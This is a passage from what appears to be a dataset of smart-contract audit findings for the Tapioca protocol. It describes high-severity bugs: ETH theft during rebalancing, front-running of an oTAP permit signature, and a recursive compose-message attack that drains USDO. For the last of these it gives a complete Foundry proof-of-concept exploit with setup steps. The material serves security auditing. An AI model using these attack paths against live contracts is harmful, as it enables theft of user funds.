This may lead to the user being liquidated more than expected, or experiencing a loss of funds in attempting to recover their position.ч```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n -All ETH can be stolen during rebalancing for `mTOFTs` that hold nativeчhighчRebalancing of ETH transfers the ETH to the destination `mTOFT` without calling `sgRecieve` which leaves the ETH hanging inside the `mTOFT` contract. This can be exploited to steal all the ETH.\\nRebalancing of `mTOFTs` that hold native tokens is done through the `routerETH` contract inside the `Balancer.sol` contract. 
Here is the code snippet for the `routerETH` contract:\\n```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n\\nThe expected behaviour is ETH being received on the destination chain whereby `sgReceive` is called and ETH is deposited inside the `TOFTVault`.\\n```\\n## mTOFT.sol\\n\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n IERC20(erc20).safeTransfer(address(vault), amountLD);\\n }\\n }\\n```\\n\\nBy taking a closer look at the logic inside the `routerETH` contract we can see that the transfer is called with an empty payload:\\n```\\n // compose stargate to swap ETH on the source to ETH on the destination\\n function swapETH(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n uint256 _amountLD, // the amount, in Local Decimals, to be swapped\\n uint256 _minAmountLD // the minimum amount accepted out on destination\\n ) external payable {\\n require(msg.value > _amountLD, \"Stargate: msg.value must be > _amountLD\");\\n\\n // wrap the ETH into WETH\\n IStargateEthVault(stargateEthVault).deposit{value: _amountLD}();\\n IStargateEthVault(stargateEthVault).approve(address(stargateRouter), _amountLD);\\n\\n // messageFee is the remainder of the msg.value after wrap\\n uint256 messageFee = msg.value - _amountLD;\\n\\n // compose a stargate swap() using the WETH that was just wrapped\\n 
stargateRouter.swap{value: messageFee}(\\n _dstChainId, // destination Stargate chainId\\n poolId, // WETH Stargate poolId on source\\n poolId, // WETH Stargate poolId on destination\\n _refundAddress, // message refund address if overpaid\\n _amountLD, // the amount in Local Decimals to swap()\\n _minAmountLD, // the minimum amount swap()er would allow to get out (ie: slippage)\\n IStargateRouter.lzTxObj(0, 0, \"0x\"),\\n _toAddress, // address on destination to send to\\n bytes(\"\") // empty payload, since sending to EOA\\n );\\n }\\n```\\n\\nNotice the comment:\\nempty payload, since sending to EOA\\nSo `routerETH` after depositing ETH in `StargateEthVault` calls the regular `StargateRouter` but with an empty payload.\\nNext, let's see how the receiving logic works.\\nAs Stargate is just another application built on top of LayerZero the receiving starts inside the `Bridge::lzReceive` function. As the type of transfer is `TYPE_SWAP_REMOTE` the `router::swapRemote` is called:\\n```\\nfunction lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n) external override {\\n\\n\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n address toAddress;\\n assembly {\\n toAddress := mload(add(to, 20))\\n }\\n router.creditChainPath(_srcChainId, srcPoolId, dstPoolId, c);\\n router.swapRemote(_srcChainId, _srcAddress, _nonce, srcPoolId, dstPoolId, dstGasForCall, toAddress, s, payload);\\n```\\n\\n`Router:swapRemote` has two responsibilities:\\nFirst it calls `pool::swapRemote` that transfers the actual tokens to the destination address. 
In this case this is the `mTOFT` contract.\\nSecond it will call `IStargateReceiver(mTOFTAddress)::sgReceive` but only if the payload is not empty.\\n```\\n function _swapRemote(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint256 _nonce,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _dstGasForCall,\\n address _to,\\n Pool.SwapObj memory _s,\\n bytes memory _payload\\n) internal {\\n Pool pool = _getPool(_dstPoolId);\\n // first try catch the swap remote\\n try pool.swapRemote(_srcChainId, _srcPoolId, _to, _s) returns (uint256 amountLD) {\\n if (_payload.length > 0) {\\n // then try catch the external contract call\\n try IStargateReceiver(_to).sgReceive{gas: _dstGasForCall}(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _payload) {\\n // do nothing\\n } catch (bytes memory reason) {\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(pool.token(), amountLD, _to, _payload);\\n emit CachedSwapSaved(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _to, _payload, reason);\\n }\\n }\\n } catch {\\n revertLookup[_srcChainId][_srcAddress][_nonce] = abi.encode(\\n TYPE_SWAP_REMOTE_RETRY,\\n _srcPoolId,\\n _dstPoolId,\\n _dstGasForCall,\\n _to,\\n _s,\\n _payload\\n );\\n emit Revert(TYPE_SWAP_REMOTE_RETRY, _srcChainId, _srcAddress, _nonce);\\n }\\n}\\n```\\n\\nAs payload is empty in case of using the `routerETH` contract the `sgReceive` function is never called. 
This means that the ETH is left sitting inside the `mTOFT` contract.\\n```\\n## TapiocaOmnichainSender.sol\\n\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n external\\n payable\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n // @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n\\n // @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) =\\n _buildOFTMsgAndOptions(_lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD);\\n\\n // @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }\\n```\\n\\nAll he has to do is specify the option type `lzNativeDrop` inside the `_lsSendParams.extraOptions` and the cost of calling `_lzSend` plus the airdrop amount will be paid out from the balance of `mTOFT`.\\nAs this is a complete theft of the rebalanced amount I'm rating this as a critical vulnerability.ч```\\nfunction swapETHAndCall(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n SwapAmount memory 
_swapAmount, // the amount and the minimum swap amount\\n IStargateRouter.lzTxObj memory _lzTxParams, // the LZ tx params\\n bytes calldata _payload // the payload to send to the destination\\n ) external payable {\\n```\\nчAll ETH can be stolen during rebalancing for mTOFTs that hold native tokens.ч```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n -exerciseOptionsReceiver() Lack of Ownership Check for oTAP, Allowing Anyone to Use oTAPTokenIDчhighчIn UsdoOptionReceiverModule.exerciseOptionsReceiver(): For this method to execute successfully, the `owner` of the `oTAPTokenID` needs to approve it to `address(usdo)`. Once approved, anyone can front-run execute `exerciseOptionsReceiver()` and utilize this authorization.\\nIn `USDO.lzCompose()`, it is possible to specify `_msgType == MSG_TAP_EXERCISE` to execute `USDO.exerciseOptionsReceiver()` across chains.\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n\\nFor this method to succeed, USDO must first obtain approve for the `oTAPTokenID`.\\nExample: The owner of `oTAPTokenID` is Alice.\\nalice in A chain execute lzSend(dstEid = B) with\\ncomposeMsg = 
[oTAP.permit(usdo,oTAPTokenID,v,r,s) 2.exerciseOptionsReceiver(oTAPTokenID,_options.from=alice) 3. oTAP.revokePermit(oTAPTokenID)]\\nin chain B USDO.lzCompose() will\\nexecute oTAP.permit(usdo,oTAPTokenID)\\nexerciseOptionsReceiver(srcChainSender=alice,_options.from=alice,oTAPTokenID )\\noTAP.revokePermit(oTAPTokenID)\\nThe signature of `oTAP.permit` is public, allowing anyone to use it.\\nNote: if alice call approve(oTAPTokenID,usdo) in chain B without signature, but The same result\\nThis opens up the possibility for malicious users to front-run use this signature. Let's consider an example with Bob:\\nBob in Chain A uses Alice's signature (v, r, s):\\ncomposeMsg = [oTAP.permit(usdo, oTAPTokenID, v, r, s), exerciseOptionsReceiver(oTAPTokenID, _options.from=bob)]-----> (Note: `_options.from` should be set to Bob.)\\nIn Chain B, when executing `USDO.lzCompose(dstEid = B)`, the following actions occur:\\nExecute `oTAP.permit(usdo, oTAPTokenID)`\\nExecute `exerciseOptionsReceiver(srcChainSender=bob, _options.from=bob, oTAPTokenID)`\\nAs a result, Bob gains unconditional access to this `oTAPTokenID`.\\nIt is advisable to check the ownership of `oTAPTokenID` is `_options.from` before executing `ITapiocaOptionBroker(_options.target).exerciseOption()`.чadd check `_options.from` is owner or be approved\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n\\n// rest of code\\n uint256 bBefore = balanceOf(address(this));\\n// Add the line below\\n address oTap = ITapiocaOptionBroker(_options.target).oTAP();\\n// Add the line below\\n address oTapOwner = IERC721(oTap).ownerOf(_options.oTAPTokenID);\\n// Add the line below\\n require(oTapOwner == _options.from\\n// Add the line below\\n || IERC721(oTap).isApprovedForAll(oTapOwner,_options.from)\\n// Add the line below\\n || IERC721(oTap).getApproved(_options.oTAPTokenID) == _options.from\\n// Add the line below\\n ,\"invalid\");\\n 
ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n }\\n```\\nчThe `exerciseOptionsReceiver()` function lacks ownership checks for `oTAP`, allowing anyone to use `oTAPTokenID`.ч```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n -Wrong parameter in remote transfer makes it possible to steal all USDO balance from usersчhighчSetting a wrong parameter when performing remote transfers enables an attack flow where USDO can be stolen from users.\\nThe following bug describes a way to leverage Tapioca's remote transfers in order to drain any user's USDO balance. Before diving into the issue, a bit of background regarding compose calls is required in order to properly understand the attack.\\nTapioca allows users to leverage LayerZero's compose calls, which enable complex interactions between messages sent across chains. Compose messages are always preceded by a sender address in order for the destination chain to understand who the sender of the compose message is. 
When the compose message is received, `TapiocaOmnichainReceiver.lzCompose()` will decode the compose message, extract the `srcChainSender_` and trigger the internal `_lzCompose()` call with the decoded `srcChainSender_` as the sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. \\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n\\nOne of the type of compose calls supported in tapioca are remote transfers. When the internal `_lzCompose()` is triggered, users who specify a msgType equal to `MSG_REMOTE_TRANSFER` will make the `_remoteTransferReceiver()` internal call be executed:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n\\n // rest of code\\n\\n}\\n```\\n\\nRemote transfers allow users to burn tokens in one chain and mint them in another chain by executing a recursive `_lzSend()` call. 
In order to burn the tokens, they will first be transferred from an arbitrary owner set by the function caller via the `_internalTransferWithAllowance()` function.\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, \\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nAfter transferring the tokens via `_internalTransferWithAllowance()`, `_internalRemoteTransferSendPacket()` will be triggered, which is the function that will actually burn the tokens and execute the recursive `_lzSend()` call:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _internalRemoteTransferSendPacket( \\n address _srcChainSender,\\n LZSendParam memory _lzSendParam, \\n bytes memory _composeMsg\\n ) internal returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt) {\\n // Burn tokens from this contract\\n (uint256 amountDebitedLD_, uint256 amountToCreditLD_) = _debitView(\\n _lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid \\n ); \\n _burn(address(this), amountToCreditLD_); \\n \\n // rest of code\\n \\n // Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, 
_composeMsg, amountToCreditLD_, _srcChainSender \\n ); // msgSender is the sender of the composed message. We keep context by passing `_srcChainSender`.\\n \\n // Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // rest of code\\n }\\n```\\n\\nAs we can see, the `_lzSend()` call performed inside `_internalRemoteTransferSendPacket()` allows to trigger the remote call with another compose message (built using the `_buildOFTMsgAndOptionsMemory()` function). If there is an actual `_composeMsg` to be appended, the sender of such message will be set to the `_internalRemoteTransferSendPacket()` function's `_srcChainSender` parameter.\\nThe problem is that when `_internalRemoteTransferSendPacket()` is called, the parameter passed as the source chain sender is set to the arbitrary owner address supplied by the caller in the initial compose call, instead of the actual source chain sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n // rest of code\\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, // <------ This parameter will become the _srcChainSender in the recursive compose message call\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nThis makes it possible for an attacker to create an attack vector that allows to drain any user's USDO balance. The attack path is as follows:\\nExecute a remote call from chain A to chain B. This call has a compose message that will be triggered in chain B.\\nThe remote transfer message will set the arbitrary `owner` to any victim's address. 
It is important to also set the amount to be transferred in this first compose call to 0 so that the `attacker` can bypass the allowance check performed inside the `_remoteTransferReceiver()` call.\\nWhen the compose call gets executed, a second packed compose message will be built and triggered inside `_internalRemoteTransferSendPacket()`. This second compose message will be sent from chain B to chain A, and the source chain sender will be set to the arbitrary `owner` address that the `attacker` wants to drain due to the incorrect parameter being passed. It will also be a remote transfer action.\\nWhen chain A receives the compose message, a third compose will be triggered. This third compose is where the token transfers will take place. Inside the `_lzReceive()` triggered in chain A, the composed message will instruct to transfer and burn a certain amount of tokens (selected by the `attacker` when crafting the attack). Because the source chain sender is the victim address and the `owner` specified is also the victim, the `_internalTransferWithAllowance()` executed in chain A will not check for allowances because the `owner` and the spender are the same address (the victim's address). This will burn the attacker's desired amount from the victim's wallet.\\nFinally, a last `_lzSend()` will be triggered to chain B, where the burnt tokens in chain A will be minted. Because the compose calls allow to set a specific recipient address, the receiver of the minted tokens will be the `attacker`.\\nAs a summary: the attack allows to combine several compose calls recursively so that an attacker can burn victim's tokens in Chain A, and mint them in chain B to a desired address. The following diagram summarizes the attack for clarity:\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. 
In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_stealUSDOFromATargetUserDueToWrongParameter() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = 
address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n \\n deal(address(aUsdo), makeAddr(\"victim\"), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // FINAL MESSAGE A ---> B \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: makeAddr(\"victim\"), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: bytes(\"\"),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes(\"\") // next message\\n );\\n\\n // SECOND MESSAGE B ---> A \\n\\n SendParam memory sendParamBToA = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 0, // IMPORTANT: This must be set to 0 to bypass the allowance check performed inside 
`_remoteTransferReceiver()`\\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(\"victim\"), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: toeComposeMsgVictim,\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n bytes(\"\") // next message\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n vm.startPrank(makeAddr(\"attacker\"));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), 
\\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // This triggers a message back to chain A, in which the srcChainSender will be set as the victim inside the\\n // composed message due to the wrong parameter passed\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Chain A: message is received, internally a compose flow is retriggered.\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n toeComposeMsgVictim\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // At this point, the srcChainSender is the victim (as set in the previous lzCompose) because of the wrong parameter (the `expectEmit` verifies it).\\n // The `owner` specified for the remote transfer is also the victim, so the allowance check is bypassed because `owner` == `srcChainSender`.\\n // This allows the 
tokens to be burnt, and a final message is triggered to the destination chain\\n UsdoReceiver(address(aUsdo)).lzCompose(\\n address(aUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(makeAddr(\"victim\"))), toeComposeMsgVictim), // message (srcChainSender becomes victim because of wrong parameter set)\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Back to chain B. Finally, the burnt tokens from the victim in chain A get minted in chain B with the attacker set as the destination\\n {\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, bUsdo.decimalConversionRate());\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n }\\n\\n // Finished: victim gets drained, attacker obtains balance of victim\\n assertEq(bUsdo.balanceOf(makeAddr(\"victim\")), 0);\\n assertEq(bUsdo.balanceOf(makeAddr(\"attacker\")), 100 ether);\\n \\n } \\n```\\n\\nRun the poc with the following command: `forge test --mt testVuln_stealUSDOFromATargetUserDueToWrongParameter`\\nThe proof of concept shows how in the end, the victim's `aUsdo` balance will become 0, while all the `bUsdo` in chain B will be minted to the attacker.чChange the parameter passed in the `_internalRemoteTransferSendPacket()` call so that the sender in the compose call built inside it is actually the real source chain sender. 
